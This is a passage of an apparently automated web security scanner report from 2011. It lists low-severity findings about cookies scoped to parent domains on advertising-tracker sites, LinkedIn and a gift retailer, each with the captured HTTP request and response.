GET /rtx/r.js?cmd=LCN&si=11684&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:45 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:20:45 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:05:45 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:05:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100145|17778^1315097086^1315098886|11684^1315097306^1315100145; path=/; expires=Sun, 04-Sep-11 01:35:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


11.48. http://tags.bluekai.com/site/4195

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4195

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/4195?id=b6f4436ac614b0358d75&?tm=915580 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bk=myAUzYJX+9Fze1lp; bkc=KJhnasHQmYdOh1O6vLZwARsO/Hc/UX3J0G2CRRepol9p1nOh1enzwT7QbhG0GwOObZaXBuYt3tPQt9wA16c8RP0Gda96wAQdMcX/S1CbvxSsY3C8/wTbBe8/wRyFOUEFUMTZOoFpzxQIn0o4xGTOCxdueIBdTtaQrY7ehOY6OLWdT1i/y+I1hrXlxKV4PAckmlR0GwOO2LcT7YYdEt5QuYoaX9XtGdn5ske8/OgsUylAq2b10g5rHKVefWrWXQs3akys; bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; bkdc=sf; bklc=4e62ca02

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62d0a8; expires=Tue, 06-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=R+zBw0JX+9Fze1lp; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5ppXnxPWROFe77YEdRf+Jag/jk/tDhVCxEanrn529VjuuyVHHwGsJsm8vRzBQBFAvJGwJKUWbFUzT7UfNFm2pMC1cMZIO8XVruNCyke121n52h+6Wzn1Aon/9FkTsruZFwxXedGe9Tt0znTYjX+G85uoeRcKZFo2q/KbZhpuF4PJn+AkQXB2cl7C1KKtAKrXIJksI5R0MlaRSpeuFdRG928HWRtNX39oZNIBjA4rS8S8myDh2tAcbIyvyIXqc1U5+hWtl2Agj5qknWtf3bdf29EhDj89=; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oiQ+J4Q9iBHVZ; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 01:13:12 GMT
Cache-Control: max-age=86400, private
BK-Server: 160f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

11.49. http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxid=01345f4e62cacd40; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Set-Cookie: adxf=696749@1@221; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.50. http://tu.connect.wunderloop.net/TU/1/1/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tu.connect.wunderloop.net
Path:   /TU/1/1/1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:10 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:48:10 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.51. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=reuters.com&pid=501 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
Cache-Control: max-age=0
If-Modified-Since: Thu, 04 Aug 2011 17:51:39 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
If-None-Match: "221d8352905f2c38b3cb2bd191d630b0"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXs4bdFipkUfSaj5XcunNcMDa7Re6IGD4lBvQyxxHPmw0Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQD6vWJNOjnJHrfysIJUvFEEVUJBxdqAyCnhnIK7WDp3tGB8GRrS9YqGZ21tipbuEa4ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 04 Sep 2011 00:48:10 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Set-Cookie: BizoData=Pp1FHRK43ZweORIlfkWqu9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZiiM5m7MKDWeaj5XcunNcMDa7Re6IGD4lFbK4oBwEGr9Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspmIzmbswoNZ5qPldy6c1wwH4DELwm2ipwN9AFjATkbkUDTbwiiAhQOisLU5UVO9T0RLQPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9s3m5pebWcHCAieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Length: 0
Connection: keep-alive


11.52. https://www.linkedin.com/secure/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:19:15 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

11.53. http://www.personalcreations.com/apparel-gifts-her-PHERAPP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /apparel-gifts-her-PHERAPP

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apparel-gifts-her-PHERAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:28 PM?0&9/3/2011 6:30:05 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:04 GMT
Connection: close
Content-Length: 280083

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.54. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /grandparents-day-gifts-PGDPDAY

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grandparents-day-gifts-PGDPDAY HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:41 GMT
Connection: close
Content-Length: 243187

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.55. http://www.personalcreations.com/halloween-home-decorations-PHALHOM

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /halloween-home-decorations-PHALHOM

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /halloween-home-decorations-PHALHOM HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:49 GMT
Connection: close
Content-Length: 201184

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.56. http://www.personalcreations.com/just-because-gifts-PJBEBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /just-because-gifts-PJBEBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /just-because-gifts-PJBEBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:28:30 PM?0&9/3/2011 6:28:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:28:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:04 GMT
Connection: close
Content-Length: 413498

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.57. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-anniversary-gifts-PANNBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-anniversary-gifts-PANNBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:48 GMT
Connection: close
Content-Length: 381211

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.58. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-back-to-school-gifts-PBKDB2S

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-back-to-school-gifts-PBKDB2S HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM?0&9/3/2011 6:19:56 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:56 GMT
Connection: close
Content-Length: 259186

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.59. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-birthday-gifts-PBIRBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-birthday-gifts-PBIRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:13 PM?0&9/3/2011 6:20:03 PM?0&9/3/2011 6:19:51 PM?0&9/3/2011 6:19:27 PM?0&9/3/2011 6:19:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:46 GMT
Connection: close
